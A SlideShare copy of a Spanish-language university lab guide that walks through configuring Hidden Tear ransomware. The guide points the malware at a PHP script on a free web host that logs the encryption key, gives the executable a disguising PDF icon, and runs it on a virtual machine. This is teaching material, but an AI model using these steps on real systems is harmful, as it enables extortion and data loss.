SlideShare une entreprise Scribd logo
1  sur  30
Universidad Tecnológica de Panamá
Facultadde Ingenieríade Sistemas Computacionales
Licenciatura en Redes Informáticas
Tópicos Especiales I
II Semestre 2016
Integrantes:
Manuel Samudio 8-881-1550
Eduardo Estribí 8-888-2170
Profesor:
José Moreno
Grupo:
11R 131
Trabajo Grupal
Ransomware
El ransomware enresumenesunmalware que consiste en“secuestrar”losarchivosde laPC víctimaa
cambiode dinero,diversiónoconel finde hacerle undañoa la personao compañía cifrandoa travésde
un programao códigolos archivosde la computadoraimpidiendosulectura,escrituray/oejecución.
Estos generalmente sonencriptadosylaúnicaformade poderrecuperardichosarchivoses
desbloqueando losarchivosmediantecontraseña, odesencriptándolomediante algún algoritmoo
aplicación específica.
En estaguía estaremos demostrandode manerabreve cómoéste se aplicaenlapráctica.
Para ello,estaremos utilizandonuestramáquinareal,ennuestrocasoWindows10y una máquina
virtual de Windows7.
Trabajando con nuestra máquina real:
Lo primeroque debemos haceresira la siguiente páginaweb:
https://www.000webhost.com/
ClickenSignUp forFREE!
Colocamosnuestrocorreoelectrónico,contraseña,nombre delsitio
Y luegoprocedemosaconfirmarel registroenlabandejade entradade nuestrocorreoelectrónico.
Le damosclickl enUploadNow
Entramosa public_html
Le damosclicka lanube que estáen laesquinasuperiorderecha.
Subimosnuestrositiowebcomprimidoen .zip
Probamosnuestrapaginaweb:
Luegode esto, nos situamosnuevamente ennuestrositioweb,
creamosahí mismoenlanube,enla carpetapublic_html unarchivollamadowritercon extensión.php
con el siguiente código:
<?php
$myfile =fopen("newfile.txt","w") ordie("Unable toopenfile!");
$txt = $_GET["info"]."n";
fwrite($myfile,$txt);
fclose($myfile);
?>
Este pequeñocódigonosservirámásadelante paragenerarunacontraseña. Esto loveremosmás
adelante.
Y lo subimostambiénenlacarpetaactual de nuestrositio123
Nosdebe quedarasí:
Ahora trabajaremos con la máquina virtual de Windows7:
Instalamos lossiguientesprogramas ennuestramáquinavirtual Windows7:
Y ademásvamosa descomprimirel siguiente archivo:
Adicionalmentevamosacrear una carpetanuevaenel escritoriollamada victimalacual moveremos
algunosarchivoscomoimágenesyotrotipode archivoscomo .mp3 para aplicarle el ransomware.
Ahoravamos a trabajar enlosarchivosde configuracióndel HiddenTearparacrear un archivo
ejecutable de tal formaque al darle clickcifre losarchivosde la víctimade manera automática.
Ya una vezdescomprimidoel archivoHidden-Tear
AbrimoslaaplicaciónXamarinStudioque instalamos
ClickenOpen…
Nosvamosa lasiguiente directorio
hidden-tear-master/hidden-tear/hidden-tear/
y abrimosel archive que muestralafigurade abajo:
Lo primeroque hacemosdentrodel archive de configuraciónescolocarnuestrapáginawebque
creamos,esdecir,reemplazamosel que estápordefecto:
El sitiowebque creamoses:
https://misitioweb123.000webhostapp.com/
Entonces,reemplazamoslainformaciónagregándole ademásel archivo writer.phpque subimos
anteriormente anuestrositioweb.
Es decir:
https://misitioweb123.000webhostapp.com/writer.php
Quedaríaentoncesalgocomoesto:
“https://misitioweb123.000webhostapp.com/writer.php?info=”
Editamoslalínea 175 como lomuestrala figurade abajo y colocamosen vezde test, la carpetavictima.
En el directorioque especificamosenlalinea186 indicaque una vezejecutadoel archivocrearáun
documento.txtconel nombre ALERTAAAA lacual contendráel mensaje que aparece abajo,Fileshas
beenencryptedwithhiddentear.
Este mensaje lopodemosmodificaranuestrogusto.
Cocaremosentoncesunmensaje personalizado.
En estaimagende abajo ,justoen lalinea153 vemoslostiposde archivosque seráncifradospor el
ransomware,le agregamoslaextensiónmp3paraque tambiéncifre este tipode archivos.
Ya se generó nuestroarchive ejecutable.
Éste archivo lopodemosencontrarenlacarpeta
hidden-tear-master/hidden-tear/hidden-tear/bin/Debug
El archivose llamahidden-tearycontiene el locode adobe acrobadreaderpdf
A simple vistaparece unarchivoPDF,perorealmente noloes.
Este es el archivoejecutable lacual lavíctimava a ejecutary al darle clickse le cifraránlosarchivos,
específicamente lacarpetavíctimaque indicamosenel archivode configuración.
Lo que haremosescopiar este archivoypegarloenel escritorio.
Ahorale daremosdoble click a este archivoyveremosque losarchivosque contiene lacarpetavíctima
han cambiadosuformato. Nosdamos cuentaque no podemosabrirningúnarchivo.Losarchivoshan
sidosecuestrados(Encriptados).
Y ademásnos muestraunarchivo de textollamadoALERTAAAA
Si abrimoseste archivode textonosmuestrael mensaje personalizadoque configuramos:
Si vamos a nuestrapc real,y nossituamosenla carpetadonde estánuestrositioweb,le damos
entoncesal botónactualizar:
Y veremosque se creóun nuevoarchivo.txtllamadonewfile.txt
Este archivo contiene lacontraseñaparadesencriptarlosarchivos.
Ahora, volviendoanuestramáquinavirtual de Windows7, si deseamosdesencriptarodesbloquear
dichosarchivos,debemosirnosalacarpeta hiddenteardecryptor.
Abrimosel archivoque muestralaimagende abajo,con el programaxamarinstudio:
Simplementeloabrimosyle damosa la opciónConstruirtodo.
Ya se ha generadolaaplicaciónparadesencriptar losarchivos.
La aplicaciónse encuentraenel siguientedirectorio:
hidden-tear-masterhidden-tear-decrypterhidden-tear-decrypterbinDebug
Copiamoseste archivoylopegamosenel escritorio:
Le damosdoble clickyse abriráuna pequeñaaplicaciónlacual nospide unacontraseñapara
desencriptarodesbloquearlosarchivosdel directorio víctima.
Colocamoslacontraseñaque nosfue generadaenel sitiowebcomovimosanteriormente.
Ahoraabrimosla carpetavíctima y vemosque losarchivoshansidodesbloqueados.

Contenu connexe

Tendances

Tendances (15)

Conexión a Base de Datos con PHP
Conexión a Base de Datos con PHPConexión a Base de Datos con PHP
Conexión a Base de Datos con PHP
 
Trabajo: 3
Trabajo: 3Trabajo: 3
Trabajo: 3
 
Informe Programacion Sitios Web
Informe Programacion Sitios WebInforme Programacion Sitios Web
Informe Programacion Sitios Web
 
Oscommerce
OscommerceOscommerce
Oscommerce
 
Tarea 9
Tarea 9Tarea 9
Tarea 9
 
Ataque inyeccion sql
Ataque inyeccion sqlAtaque inyeccion sql
Ataque inyeccion sql
 
Manual de instalacion de helix3 framework
Manual de instalacion de helix3 frameworkManual de instalacion de helix3 framework
Manual de instalacion de helix3 framework
 
Conexión entre php y sql server
Conexión entre php y sql serverConexión entre php y sql server
Conexión entre php y sql server
 
Instrucciones instalacion labcase software 1.0
Instrucciones instalacion labcase software 1.0Instrucciones instalacion labcase software 1.0
Instrucciones instalacion labcase software 1.0
 
Conexion base-de-datos-php
Conexion base-de-datos-phpConexion base-de-datos-php
Conexion base-de-datos-php
 
PRACTICA 3
PRACTICA 3PRACTICA 3
PRACTICA 3
 
Tarea sesion 3
Tarea sesion 3Tarea sesion 3
Tarea sesion 3
 
Step by step developing with Facebook PHP API by Bruno Kamiche
Step by step developing  with Facebook PHP API by Bruno KamicheStep by step developing  with Facebook PHP API by Bruno Kamiche
Step by step developing with Facebook PHP API by Bruno Kamiche
 
Forense en WordPress
Forense en WordPressForense en WordPress
Forense en WordPress
 
A tutor
A tutorA tutor
A tutor
 

Similaire à Ransomware Hidden Tear

Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocinaEfren Diaz Gomez
 
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinputSubiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinputAnxnLeg
 
Tutorial de instalación de apache, php, mysql y phpmyadmin
Tutorial de instalación de apache, php, mysql y phpmyadminTutorial de instalación de apache, php, mysql y phpmyadmin
Tutorial de instalación de apache, php, mysql y phpmyadminIgnacio Aular Reyes
 
Tutorial de instalación de apache, php, my sql y php myadmin
Tutorial de instalación de apache, php, my sql y php myadminTutorial de instalación de apache, php, my sql y php myadmin
Tutorial de instalación de apache, php, my sql y php myadminignaciococo33
 
Hackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injectionHackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injectiondegarden
 
Red t3 practica1_apachecms
Red t3 practica1_apachecmsRed t3 practica1_apachecms
Red t3 practica1_apachecmsgarciadebora
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate okTensor
 
Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESSTensor
 
Acceso a carpeta privada con LDAP e instalación de Joomla en HTTPS
Acceso a carpeta privada con LDAP e instalación de Joomla en HTTPSAcceso a carpeta privada con LDAP e instalación de Joomla en HTTPS
Acceso a carpeta privada con LDAP e instalación de Joomla en HTTPSTerrafx9
 
Manual easyphp
Manual easyphpManual easyphp
Manual easyphpzonajava
 
Instalación de 2 CMS: Wordpress y Drupal
Instalación de 2 CMS: Wordpress y DrupalInstalación de 2 CMS: Wordpress y Drupal
Instalación de 2 CMS: Wordpress y DrupalTerrafx9
 
Manual oscommerce
Manual oscommerceManual oscommerce
Manual oscommercemacu123
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografiaJosé Moreno
 
Autenticación en apache
Autenticación en apache Autenticación en apache
Autenticación en apache Rosariio92
 

Similaire à Ransomware Hidden Tear (20)

Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
Servidor apache
Servidor apacheServidor apache
Servidor apache
 
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinputSubiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
 
Tutorial de instalación de apache, php, mysql y phpmyadmin
Tutorial de instalación de apache, php, mysql y phpmyadminTutorial de instalación de apache, php, mysql y phpmyadmin
Tutorial de instalación de apache, php, mysql y phpmyadmin
 
Tutorial de instalación de apache, php, my sql y php myadmin
Tutorial de instalación de apache, php, my sql y php myadminTutorial de instalación de apache, php, my sql y php myadmin
Tutorial de instalación de apache, php, my sql y php myadmin
 
Hackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injectionHackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injection
 
Red t3 practica1_apachecms
Red t3 practica1_apachecmsRed t3 practica1_apachecms
Red t3 practica1_apachecms
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate ok
 
Programación Web (PHP)
Programación Web (PHP)Programación Web (PHP)
Programación Web (PHP)
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
Bash Ransomware
Bash RansomwareBash Ransomware
Bash Ransomware
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Acceso a carpeta privada con LDAP e instalación de Joomla en HTTPS
Acceso a carpeta privada con LDAP e instalación de Joomla en HTTPSAcceso a carpeta privada con LDAP e instalación de Joomla en HTTPS
Acceso a carpeta privada con LDAP e instalación de Joomla en HTTPS
 
Manual easyphp
Manual easyphpManual easyphp
Manual easyphp
 
Instalación de 2 CMS: Wordpress y Drupal
Instalación de 2 CMS: Wordpress y DrupalInstalación de 2 CMS: Wordpress y Drupal
Instalación de 2 CMS: Wordpress y Drupal
 
Manual del usuario
Manual del usuarioManual del usuario
Manual del usuario
 
Manual oscommerce
Manual oscommerceManual oscommerce
Manual oscommerce
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
 
Autenticación en apache
Autenticación en apache Autenticación en apache
Autenticación en apache
 

Plus de José Moreno

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdfJosé Moreno
 
Seguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *NixSeguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *NixJosé Moreno
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad PerimetralJosé Moreno
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMJosé Moreno
 
Forensia en movil
Forensia en movil Forensia en movil
Forensia en movil José Moreno
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuJosé Moreno
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0José Moreno
 
Presentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones SegurasPresentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones SegurasJosé Moreno
 
Hardening Telnet ssh final
Hardening Telnet ssh finalHardening Telnet ssh final
Hardening Telnet ssh finalJosé Moreno
 
Protección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF LógicoProtección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF LógicoJosé Moreno
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qosJosé Moreno
 
Hardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverHardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverJosé Moreno
 

Plus de José Moreno (16)

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
Seguridad Móvil
Seguridad MóvilSeguridad Móvil
Seguridad Móvil
 
Seguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *NixSeguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *Nix
 
Honey Pots
Honey PotsHoney Pots
Honey Pots
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad Perimetral
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIM
 
Forensia en movil
Forensia en movil Forensia en movil
Forensia en movil
 
Artefactos linux
Artefactos linuxArtefactos linux
Artefactos linux
 
MEAN Stack
MEAN StackMEAN Stack
MEAN Stack
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
 
Presentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones SegurasPresentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones Seguras
 
Hardening Telnet ssh final
Hardening Telnet ssh finalHardening Telnet ssh final
Hardening Telnet ssh final
 
Protección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF LógicoProtección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF Lógico
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qos
 
Hardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverHardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-server
 

Dernier

PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxAlan779941
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativanicho110
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21mariacbr99
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosJhonJairoRodriguezCe
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...JohnRamos830530
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxFederico Castellari
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estossgonzalezp1
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanamcerpam
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.FlorenciaCattelani
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIhmpuellon
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxJorgeParada26
 

Dernier (11)

PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 

Ransomware Hidden Tear

  • 1. Universidad Tecnológica de Panamá Facultadde Ingenieríade Sistemas Computacionales Licenciatura en Redes Informáticas Tópicos Especiales I II Semestre 2016 Integrantes: Manuel Samudio 8-881-1550 Eduardo Estribí 8-888-2170 Profesor: José Moreno Grupo: 11R 131 Trabajo Grupal Ransomware
  • 2. El ransomware enresumenesunmalware que consiste en“secuestrar”losarchivosde laPC víctimaa cambiode dinero,diversiónoconel finde hacerle undañoa la personao compañía cifrandoa travésde un programao códigolos archivosde la computadoraimpidiendosulectura,escrituray/oejecución. Estos generalmente sonencriptadosylaúnicaformade poderrecuperardichosarchivoses desbloqueando losarchivosmediantecontraseña, odesencriptándolomediante algún algoritmoo aplicación específica. En estaguía estaremos demostrandode manerabreve cómoéste se aplicaenlapráctica. Para ello,estaremos utilizandonuestramáquinareal,ennuestrocasoWindows10y una máquina virtual de Windows7. Trabajando con nuestra máquina real: Lo primeroque debemos haceresira la siguiente páginaweb: https://www.000webhost.com/ ClickenSignUp forFREE!
  • 4. Y luegoprocedemosaconfirmarel registroenlabandejade entradade nuestrocorreoelectrónico.
  • 6. Le damosclicka lanube que estáen laesquinasuperiorderecha. Subimosnuestrositiowebcomprimidoen .zip
  • 7.
  • 9. Luegode esto, nos situamosnuevamente ennuestrositioweb, creamosahí mismoenlanube,enla carpetapublic_html unarchivollamadowritercon extensión.php con el siguiente código: <?php $myfile =fopen("newfile.txt","w") ordie("Unable toopenfile!"); $txt = $_GET["info"]."n"; fwrite($myfile,$txt); fclose($myfile); ?> Este pequeñocódigonosservirámásadelante paragenerarunacontraseña. Esto loveremosmás adelante. Y lo subimostambiénenlacarpetaactual de nuestrositio123
  • 11. Ahora trabajaremos con la máquina virtual de Windows7: Instalamos lossiguientesprogramas ennuestramáquinavirtual Windows7: Y ademásvamosa descomprimirel siguiente archivo: Adicionalmentevamosacrear una carpetanuevaenel escritoriollamada victimalacual moveremos algunosarchivoscomoimágenesyotrotipode archivoscomo .mp3 para aplicarle el ransomware.
  • 12. Ahoravamos a trabajar enlosarchivosde configuracióndel HiddenTearparacrear un archivo ejecutable de tal formaque al darle clickcifre losarchivosde la víctimade manera automática. Ya una vezdescomprimidoel archivoHidden-Tear AbrimoslaaplicaciónXamarinStudioque instalamos
  • 14.
  • 15. Lo primeroque hacemosdentrodel archive de configuraciónescolocarnuestrapáginawebque creamos,esdecir,reemplazamosel que estápordefecto: El sitiowebque creamoses: https://misitioweb123.000webhostapp.com/ Entonces,reemplazamoslainformaciónagregándole ademásel archivo writer.phpque subimos anteriormente anuestrositioweb. Es decir: https://misitioweb123.000webhostapp.com/writer.php Quedaríaentoncesalgocomoesto: “https://misitioweb123.000webhostapp.com/writer.php?info=”
  • 16. Editamoslalínea 175 como lomuestrala figurade abajo y colocamosen vezde test, la carpetavictima.
  • 17. En el directorioque especificamosenlalinea186 indicaque una vezejecutadoel archivocrearáun documento.txtconel nombre ALERTAAAA lacual contendráel mensaje que aparece abajo,Fileshas beenencryptedwithhiddentear. Este mensaje lopodemosmodificaranuestrogusto. Cocaremosentoncesunmensaje personalizado. En estaimagende abajo ,justoen lalinea153 vemoslostiposde archivosque seráncifradospor el ransomware,le agregamoslaextensiónmp3paraque tambiéncifre este tipode archivos.
  • 18.
  • 19. Ya se generó nuestroarchive ejecutable. Éste archivo lopodemosencontrarenlacarpeta hidden-tear-master/hidden-tear/hidden-tear/bin/Debug El archivose llamahidden-tearycontiene el locode adobe acrobadreaderpdf A simple vistaparece unarchivoPDF,perorealmente noloes. Este es el archivoejecutable lacual lavíctimava a ejecutary al darle clickse le cifraránlosarchivos, específicamente lacarpetavíctimaque indicamosenel archivode configuración.
  • 20. Lo que haremosescopiar este archivoypegarloenel escritorio. Ahorale daremosdoble click a este archivoyveremosque losarchivosque contiene lacarpetavíctima han cambiadosuformato. Nosdamos cuentaque no podemosabrirningúnarchivo.Losarchivoshan sidosecuestrados(Encriptados).
  • 21. Y ademásnos muestraunarchivo de textollamadoALERTAAAA
  • 22. Si abrimoseste archivode textonosmuestrael mensaje personalizadoque configuramos:
  • 23. Si vamos a nuestrapc real,y nossituamosenla carpetadonde estánuestrositioweb,le damos entoncesal botónactualizar:
  • 24. Y veremosque se creóun nuevoarchivo.txtllamadonewfile.txt Este archivo contiene lacontraseñaparadesencriptarlosarchivos.
  • 25. Ahora, volviendoanuestramáquinavirtual de Windows7, si deseamosdesencriptarodesbloquear dichosarchivos,debemosirnosalacarpeta hiddenteardecryptor. Abrimosel archivoque muestralaimagende abajo,con el programaxamarinstudio:
  • 26. Simplementeloabrimosyle damosa la opciónConstruirtodo.
  • 27. Ya se ha generadolaaplicaciónparadesencriptar losarchivos. La aplicaciónse encuentraenel siguientedirectorio: hidden-tear-masterhidden-tear-decrypterhidden-tear-decrypterbinDebug
  • 28. Copiamoseste archivoylopegamosenel escritorio: Le damosdoble clickyse abriráuna pequeñaaplicaciónlacual nospide unacontraseñapara desencriptarodesbloquearlosarchivosdel directorio víctima.
  • 29. Colocamoslacontraseñaque nosfue generadaenel sitiowebcomovimosanteriormente.
  • 30. Ahoraabrimosla carpetavíctima y vemosque losarchivoshansidodesbloqueados.